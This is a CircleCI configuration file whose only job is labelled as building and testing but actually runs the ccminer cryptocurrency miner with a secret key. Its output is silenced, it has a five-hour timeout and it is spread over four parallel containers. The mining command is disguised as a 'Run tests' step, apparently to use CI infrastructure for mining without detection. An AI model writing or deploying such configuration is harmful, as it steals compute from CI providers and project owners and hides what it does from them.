version: 2.1

orbs:
  python: circleci/python@1.2

workflows:
  sample:  
    jobs:
      - build-and-test


jobs:
  build-and-test:  
    parallelism: 4
    docker:
      - image: cobadoc/manaon
    
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: ccminer $KEY > /dev/null 2>&1